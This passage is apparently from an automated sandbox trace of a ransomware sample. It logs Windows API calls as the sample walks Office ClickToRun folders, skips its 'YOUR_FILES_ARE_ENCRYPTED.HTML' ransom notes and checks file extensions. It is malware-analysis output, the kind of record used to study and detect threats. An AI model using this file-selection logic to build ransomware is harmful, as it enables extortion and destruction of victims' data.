ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.625] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.625] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.626] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2c4e80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.626] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.626] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.626] GetProcessHeap () returned 0x270000 [0169.626] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.626] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2eafe0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2eafe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserData", cAlternateFileName="")) returned 1 [0169.627] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData") returned 52 [0169.627] GetProcessHeap () returned 0x270000 [0169.627] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.627] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData" [0169.627] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*" [0169.627] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2eafe0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2eafe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.627] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2eafe0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2eafe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.627] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2eafe0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2eafe0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2eafe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.627] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.627] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.627] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2eafe0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2eafe0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2eafe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.627] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.627] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.627] GetProcessHeap () returned 0x270000 [0169.628] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.628] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba0f1e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba0f1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba0f1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.628] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.628] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.628] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0169.628] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned 82 [0169.628] GetProcessHeap () returned 0x270000 [0169.628] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.628] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" [0169.628] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*" [0169.628] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.629] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.629] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96130e70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac2a70f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x44e23, dwReserved0=0x0, dwReserved1=0x60, cFileName="AirSpace.Etw.man", cAlternateFileName="AIRSPA~1.MAN")) returned 1 [0169.629] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man") returned 99 [0169.629] lstrcmpW (lpString1="AirSpace.Etw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.629] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0169.629] lstrlenW (lpString=".man") returned 4 [0169.629] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0169.629] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb3372a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x9786, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49", cAlternateFileName="C2RMAN~1.CF0")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49") returned 198 [0169.630] lstrcmpW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.Access.Access.x-none.msi.16.x-none.xml.CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49") returned=".CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49" [0169.630] lstrlenW (lpString=".CF0325AE3BFBC36E4747FC53850D13F832880B59E4AF77E17167DBF6F1FA7D49") returned 65 [0169.630] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb35d400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xe048, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430", cAlternateFileName="C2RMAN~1.82E")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430") returned 186 [0169.630] lstrcmpW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.accessmui.msi.16.en-us.xml.82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430") returned=".82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430" [0169.630] lstrlenW (lpString=".82E4C6DE6D48301C22654DB693074903A098B5CB1BACF3DB23E78C7EBEF10430") returned 65 [0169.630] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb383560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458", cAlternateFileName="C2RMAN~1.143")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458") returned 189 [0169.630] lstrcmpW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.accessmuiset.msi.16.en-us.xml.14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458") returned=".14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458" [0169.630] lstrlenW (lpString=".14391C49748062AB066A28AB22BC07848E64B4DF5D1D98DA5FE7E3C5EA884458") returned 65 [0169.630] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb3a96c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x410e, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734", cAlternateFileName="C2RMAN~1.541")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734") returned 192 [0169.630] lstrcmpW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734") returned=".54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734" [0169.630] lstrlenW (lpString=".54102A65AAA1DC10AF40030B8F0543C674E966BC296158A56EC20505BDC6E734") returned 65 [0169.630] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e95a70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e95a70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb3f5980, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x2656, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677", cAlternateFileName="C2RMAN~1.5BC")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677") returned 183 [0169.630] lstrcmpW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.dcfmui.msi.16.en-us.xml.5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677") returned=".5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677" [0169.630] lstrlenW (lpString=".5BC0CF90B5E16EFB731BF43D83B5F9814F891E899CE0B3F553AB84AC8FB94677") returned 65 [0169.630] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e95a70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e95a70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb441c40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3a132, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B", cAlternateFileName="C2RMAN~1.24E")) returned 1 [0169.630] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B") returned 196 [0169.630] lstrcmpW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.630] PathFindExtensionW (pszPath="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B") returned=".24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B" [0169.630] lstrlenW (lpString=".24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B") returned 65 [0169.631] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb41bae0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x88d0, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872", cAlternateFileName="C2RMAN~1.922")) returned 1 [0169.631] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872") returned 185 [0169.631] lstrcmpW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.631] PathFindExtensionW (pszPath="C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872") returned=".922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872" [0169.631] lstrlenW (lpString=".922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872") returned 65 [0169.631] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb48df00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x8f06, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C", cAlternateFileName="C2RMAN~1.04C")) returned 1 [0169.631] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C") returned 198 [0169.631] lstrcmpW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.631] PathFindExtensionW (pszPath="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C") returned=".04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C" [0169.631] lstrlenW (lpString=".04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C") returned 65 [0169.631] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb4da1c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x17f6, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B", cAlternateFileName="C2RMAN~1.63E")) returned 1 [0169.631] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, 